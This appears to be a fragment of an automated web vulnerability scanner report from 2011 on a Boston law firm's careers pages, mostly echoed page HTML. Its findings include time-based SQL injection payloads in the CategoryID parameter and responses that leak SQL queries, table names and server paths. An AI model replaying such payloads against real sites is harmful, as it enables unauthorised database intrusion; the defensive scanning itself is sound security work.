href="http://www.nutter.com/about.php" title="ABOUT US" onmouseover="rollover('about', 'http://www.nutter.com/media/leftNav/about_over.gif')" onmouseout="rollover('about', 'http://www.nutter.com/media/leftNav/about.gif')"><img src="http://www.nutter.com/media/leftNav/about.gif" name="about" alt="ABOUT US"/></a><a href="http://www.nutter.com/client_services.php" title="CLIENT SERVICES" onmouseover="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services_over.gif')" onmouseout="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services.gif')"><img src="http://www.nutter.com/media/leftNav/client_services.gif" name="client_services" alt="CLIENT SERVICES"/></a><a href="http://www.nutter.com/attorneys.php" title="ATTORNEYS" onmouseover="rollover('attorneys', 'http://www.nutter.com/media/leftNav/attorneys_over.gif')" onmouseout="rollover('attorneys', 'http://www.nutter.com/media/leftNav/attorneys.gif')"><img src="http://www.nutter.com/media/leftNav/attorneys.gif" name="attorneys" alt="ATTORNEYS"/></a><a href="http://www.nutter.com/publications_events.php" title="PUBLICATIONS & EVENTS" onmouseover="rollover('publications_events', 'http://www.nutter.com/media/leftNav/publications_events_over.gif')" onmouseout="rollover('publications_events', 'http://www.nutter.com/media/leftNav/publications_events.gif')"><img src="http://www.nutter.com/media/leftNav/publications_events.gif" name="publications_events" alt="PUBLICATIONS & EVENTS"/></a><a href="http://www.nutter.com/careers.php" title="CAREERS" onmouseover="rollover('careers', 'http://www.nutter.com/media/leftNav/careers_over.gif')" onmouseout="rollover('careers', 'http://www.nutter.com/media/leftNav/careers_over.gif')"><img src="http://www.nutter.com/media/leftNav/careers_over.gif" name="careers" alt="CAREERS"/></a><a href="http://www.nutter.com/offices.php" title="OFFICES" onmouseover="roll..
PHP Version Disclosure
PHP Version Disclosure
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.
Impact
An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
PHP/4.4.9
Request
GET /careers.php?CategoryID=23 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.nutter.com Accept-Encoding: gzip, deflate Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Wed, 20 Apr 2011 01:09:54 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html <!-- careers start --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><!--Laterals : Careers : Nutter McClennen & Fish LLP--> <title>Laterals : Careers : Nutter McClennen & Fish LLP</title><!-- <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." />--> <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.careers.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.careers.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start --> <div id="printHeader"> <img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/> </div> <div id="bodyContainer"> <div id="headerArea"> <ul> <li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li> <li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li> <li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li> </ul> <form method="get" id="searchField" action="http://www.nutter.com/search.php"> <div id="siteSearch"> <input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/> </div> </form> </div> <!-- header end --> <!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <!-- Start Right Ads --><div id="Ads"> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent1", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"); adfo.write("adFlashContent1"); </script> </div> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent2", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"); adfo.write("adFlashContent2"); </script> </div><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent"> <ul id="industryNav"> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=6" title="Life Sciences" id="keyLife"><span>LIFE SCIENCES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=4" title="Financial Services" id="keyFinance"><span>FINANCIAL SERVICES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=13" title="Real Estate" id="keyReal"><span>REAL ESTATE</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=10" title="Manufacturing" id="keyManufacture"><span>MANUFACTURING</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=15" title="Technology" id="keyTech"><span>TECHNOLOGY</span></a></li> <li><a href="http://www.nutter.com/client_services.php" title="More" id="keyMore"><span>MORE</span></a></li></ul><img src="/media/aboutus/media.221.jpg" width="450" height="124" id="smallImage"><h2><img src="/media/aboutus/media.362.gif" border="0" title="" alt=""></h2><ul id="categoryNav"><li><a href="javascript:void(0)" title="Law Students">Law Students</a> <ul> <li class="Top"><a href="http://www.nutter.com/careers.php?CategoryID=22&CareerID=3&subID=1" title="Summer Associate Program">Summer Associate Program</a></li> <li><a href="http://www.nutter.com/careers.php?CategoryID=22&CareerID=4&subID=1" title="Fall Recruiting">Fall Recruiting</a></li> </ul> </li><li><a href="http://www.nutter.com/careers.php?CategoryID=23" title="Laterals" class="Left" id="hilited">Laterals</a><li><a href="http://www.nutter.com/careers.php?CategoryID=24" title="Administrative Staff" class="Left">Administrative Staff</a> </ul> <div id="subNav" class="Raised"> <h3><img src="/media/aboutus/media.343.gif" border="0" title="" alt=""></h3> <ul> <li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=17&SectionID=380" title="Overview">Overview</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=5&SectionID=378" title="Open Positions">Open Positions</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=7&SectionID=367" title="Diversity">Diversity</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=8&SectionID=384" title="Nutter's Clients">Nutter's Clients</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=9&SectionID=382" title="Pro Bono & Community Service">Pro Bono & Community Service</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=10&SectionID=361" title="Training & Mentoring">Training & Mentoring</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=11&SectionID=374" title="Benefits">Benefits</a></li><li><a href="http://www.nutter.com/careers.php?CategoryID=23&CareerID=19&SectionID=1041" title="AmLaw Mid-Level Associates Survey">AmLaw Mid-Level Associates Survey</a></li> </ul><!-- dkoleba 2010/11/11 start --> <a href="http://www.nutter.com/media/news/media.669.pdf" target="_blank" style="border: 0;"><img src="../media/images/Midlevel_2010_Nutter2_114v1.jpg" width="114" border="0" style="margin-top: 15px; margin-left: 8px;"></a><!-- <a href="/publications_events.php?NewsID=689" style="border-bottom: 0px;"><img src="../media/images/2008BestPlaces.jpg" alt="Best Places to Work - Boston Business Journal 2008" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a> <br/> <a href="../media/images/media.bestplacetowork.pdf" target="_blank" style="border-bottom: 0px;"><img src="../media/images/marketinglogocolorfinal.jpg" alt="The Boston Globe - GLOBE100's - Top Places to Work '08" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a>dkoleba 2010/11/11 end --></div><div id="NarrativeText"><p><a href="/media/news/media.669.pdf" target="_blank"><strong>Nutter Ranks #1 Nationally for Associate Satisfaction for Third Consecutive Year</strong></a></p>If you want a challenging and supportive environment in which to advance your career, then we invite you to explore joining Nutter.<br /><br />For Associate or Technical Specialists opportunities, please contact:<br /><p>Terese Cunningham, Director of Legal Recruitment<br />Nutter McClennen & Fish LLP<br />Seaport West<br />155 Seaport Boulevard<br />Boston, MA 02210<br />Email: <a target="_blank" href="mailto: tcunningham@nutter.com">tcunningham@nutter.com</a><br />Phone: 617-439-2351<br /></p><p>For Partnership opportunities, please contact: <br /></p><p>James E. Dawson, Esq.<br />Nutter McClennen & Fish LLP<br />Seaport West<br />155 Seaport Boulevard<br />Boston, MA 02210<br />E-mail:<a target="_blank" href="mailto: jdawson@nutter.com"> jdawson@nutter.com</a><br />Phone: 617-439-2623 <br /></p></div> </div><h1><a href="http://www.nutter.com/home.php" title="Nutter McClennen & Fish"><span>Laterals : Careers : Nutter McClennen & Fish LLP</span></a></h1><div id="Navigation"> <a href="http://www.nutter.com/about.php" title="ABOUT US" onmouseover="rollover('about', 'http://www.nutter.com/media/leftNav/about_over.gif')" onmouseout="rollover('about', 'http://www.nutter.com/media/leftNav/about.gif')"><img src="http://www.nutter.com/media/leftNav/about.gif" name="about" alt="ABOUT US"/></a><a href="http://www.nutter.com/client_services.php" title="CLIENT SERVICES" onmouseover="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services_over.gif')" onmouseout="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services.gif')"><img src="http://www.nutter.com/media/leftNav/client_services.gif" name="client_services" alt="CLIENT SERVICES"/></a><a href="http://www.nutter.com/attorneys.php" title="ATTORNEYS" onmouseover="rollover('attorneys', 'http://www.nutter.com/media/leftNav/attorneys_over.gif')" onmouseout="rollover('attorneys', 'http://www.nutter.com/media/leftNav/attorneys.gif')"><img src="http://www.nutter.com/media/leftNav/attorneys.gif" name="attorneys" alt="ATTORNEYS"/></a><a href="http://www.nutter.com/publications_events.php" title="PUBLICATIONS & EVENTS" onmouseover="rollover('publications_events', 'http://www.nutter.com/media/leftNav/publications_events_over.gif')" onmouseout="rollover('publications_events', 'http://www.nutter.com/media/leftNav/publications_events.gif')"><img src="http://www.nutter.com/media/leftNav/publications_events.gif" name="publications_events" alt="PUBLICATIONS & EVENTS"/></a><a href="http://www.nutter.com/careers.php" title="CAREERS" onmouseover="rollover('careers', 'http://www.nutter.com/media/leftNav/careers_over.gif')" onmouseout="rollover('careers', 'http://www.nutter.com/media/leftNav/careers_over.gif')"><img src="http://www.nutter.com/media/leftNav/careers_over.gif" name="careers" alt="CAREERS"/></a><a href="http://www.nutter.com/offices.php" title="OFFICES" onmouseover="roll..
Database Error Message
Database Error Message
Netsparker identified a database error message.
Impact
The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.
Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
Parameters
Parameter
Type
Value
CategoryID
GET
1;WAITFOR DELAY '0:0:25'--
Request
GET /careers.php?CategoryID=1;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.nutter.com Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Wed, 20 Apr 2011 01:10:44 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Transfer-Encoding: chunked Content-Type: text/html <!-- careers start -->error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY \'0:0:25\'--' at line 1 | 1064<BR>sql: SELECT CategoryName FROM _categories WHERE CategoryID=1;WAITFOR DELAY \'0:0:25\'--<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" />error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY \'0:0:25\'-- ORDER BY C.CareerTitle LIMIT 1' at line 1 | 1064<BR>sql: SELECT DISTINCT(C.CareerID) FROM careers C,_relations R1,_relations R2 WHERE C.IsActive='y' AND C.CareerID=R1.FieldValue AND R1.TableName='careers' AND R1.KeyID=R2.KeyID AND R2.TableName='_categories' AND R2.FieldValue=1;WAITFOR DELAY \'0:0:25\'-- ORDER BY C.CareerTitle LIMIT 1<br /><b>Fatal error</b>: Call to a member function on a non-object in <b>/usr/local/apache/htdocs/_templates/objects/seo.php</b> on line <b>343</b><br />
Programming Error Message
Programming Error Message
Netsparker identified a programming error message.
Impact
The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. Source code, stack trace, etc. type data may be disclosed. Most of these issues will be identified and reported separately by Netsparker.
Do not provide error messages on production environments. Save error messages with a reference number to a backend storage such as a log, text file or database then show this number and a static user-friendly error message to the user.
Parameters
Parameter
Type
Value
CategoryID
GET
';WAITFOR DELAY '0:0:25'--
CareerID
GET
17
SectionID
GET
380
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b>
Request
GET /careers.php?CategoryID=%27;WAITFOR%20DELAY%20%270:0:25%27--&CareerID=17&SectionID=380 HTTP/1.1 Referer: http://www.nutter.com/careers.php?CategoryID=23 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.nutter.com Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Wed, 20 Apr 2011 01:10:24 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Transfer-Encoding: chunked Content-Type: text/html <!-- careers start --><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><!--Careers : --> <title>Careers : </title><!-- <meta name="keywords" content="" /> <meta name="description" content="" />--> <meta name="keywords" content="" /> <meta name="description" content="" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.careers.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.careers.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start --> <div id="printHeader"> <img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/> </div> <div id="bodyContainer"> <div id="headerArea"> <ul> <li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li> <li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li> <li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li> </ul> <form method="get" id="searchField" action="http://www.nutter.com/search.php"> <div id="siteSearch"> <input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/> </div> </form> </div> <!-- header end --> <!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><!-- Start Right Ads --><div id="Ads"><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent"> <br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Notice</b>: Undefined offset: 1 in <b>/usr/local/apache/htdocs/_templates/templates.careers.php</b> on line <b>50</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Notice</b>: Undefined offset: 1 in <b>/usr/local/apache/htdocs/_templates/templates.careers.php</b> on line <b>75</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><h2></h2><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><ul id="categoryNav"> </ul> <div id="subNav" class="Raised" style="cursor: default;"><!-- dkoleba 2010/11/11 start --> <a href="http://www.nutter.com/media/news/media.669.pdf" target="_blank" style="margin-top: 15px; margin-left: 11px; border: 0;"><img src="../media/images/Midlevel_2010_Nutter2_114v1.jpg" width="114" border="0"></a><!-- <a href="/publications_events.php?NewsID=689" style="border-bottom: 0px;"><img src="../media/images/2008BestPlaces.jpg" alt="Best Places to Work - Boston Business Journal 2008" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a><br/> <a href="../media/images/media.bestplacetowork.pdf" target="_blank" style="border-bottom: 0px;"><img src="../media/images/marketinglogocolorfinal.jpg" alt="The Boston Globe - GLOBE100's - Top Places to Work '08" width="86" height="86" border="0" style="margin-top: 15px; margin-left: 25px;"></a>dkoleba 2010/11/11 end --></div><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><br /><b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/usr/local/apache/pnc_nutter/adodb/drivers/adodb-mysql.inc.php</b> on line <b>340</b><br /><div id="NarrativeText"></div> </div><h1><a href="http://www.nutter.com/home.php" title="Nutter McClennen & Fish"><span>Careers : </span></a></h1><div id="Navigation"> <a href="http://www.nutter.com/about.php" title="ABOUT US" onmouseover="rollover('about', 'http://www.nutter.com/media/leftNav/about_over.gif')" onmouseout="rollover('about', 'http://www.nutter.com/media/leftNav/about.gif')"><img src="http://www.nutter.com/media/leftNav/about.gif" name="about" alt="ABOUT US"/></a><a href="http://www.nutter.com/client_services.php" title="CLIENT SERVICES" onmouseover="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services_over.gif')" onmouseout="rollover('client_services', 'http://www.nutter.com/media/leftNav/client_services.gif')"><img src="http://www.nutter.com/media/leftNav/client_services.gif" name="client_services" alt="CLIENT SERVICES"/></a><a href="http://www.nutter.com/attorneys.php" title="ATTORNEYS" onmouseover="rollover('attorneys', 'http://www.nutter.com/media/leftNav/attorneys_over.gif')" onmouseout="rollover('attorneys', 'http://www.nutter.com/media/leftNav/attorneys.gif')"><img src="http://www.nutter.com/media/leftNav/attorneys.gif" name="attorneys" alt="ATTORNEYS"/></a><a href="http://www.nutter.com/publications_events.php" title="PUBLICATIONS & EVENTS" onmouseover="rollover('publications_events', 'http://www.nutter.com/media/leftNav/publications_events_over.gif')" onmouseout="rollover('publications_events', 'http://www.nutter.com/media/leftNav/publications_events.gif')"><img src="http://www.nutter.com/media/leftNav/publications_events.gif" name="publications_events" alt="PUBLICATIONS & EVENTS"/></a><a href="http://www.nutter.com/careers.php" title="CAREERS" onmouseover="rollover('careers', 'http://www.nutter.com/media/leftNav/careers_over.gif')" onmouseout="rollover('careers', 'http://www.nutter.com/media/leftNav/careers_over.gif')"><img src="http://www.nutter.com/media/leftNav/careers_over.gif" name="careers" alt="CAREERS"/></a><a href="http://www.nutter.com/offices.php" title="OFFICES" onmouseover="rollover('offices', 'http://www.nutter.com/media/leftNav/offices_over.gif')" onmouseout="rollover('offices', 'http://www.nutter.com/media/leftNav/offices.gif')"><img src="http://www.nutter.com/media/leftNav/offices.gif" name="offices" alt="OFFICES"/></a><a href="http://www.nutter.com/client_services.php?SectionID=2" title="NUTTER INVESTMENT ADVISORS" onmouseover="rollover('advisors', 'http://www.nutter.com/media/leftNav/advisors_over.gif')" onmouseout="rollover('advisors', 'http://www.nutter.com/media/leftNav/advisors.gif')"><img src="http://www.nutter.com/media/leftNav/advisors.gif" name="advisors" alt="NUTTER INVESTMENT ADVISORS"/></a> </div></div><!-- body end --> <!--- sIFR script ---><script type="text/javascript">//<![CDATA[// Load the sIFR font for the feed's title.if(typeof sIFR == "function"){ sIFR.replaceElement(named({sSelector:"h1", sFlashSrc:"./_sifr/century.swf", sColor:"#244185", sHoverColor:"#666666", sBgColor:"#ffffff", sFlashVars:""})); //sIFR.replaceElement(named({sSelector:"h1", sFlashSrc:"./_sifr/georgia.swf", sColor:"#244185", sHoverColor:"#666666", sBgColor:"#ffffff", sFlashVars:""}));};//]]></script> <!-- footer start --> <div id="footerArea"> 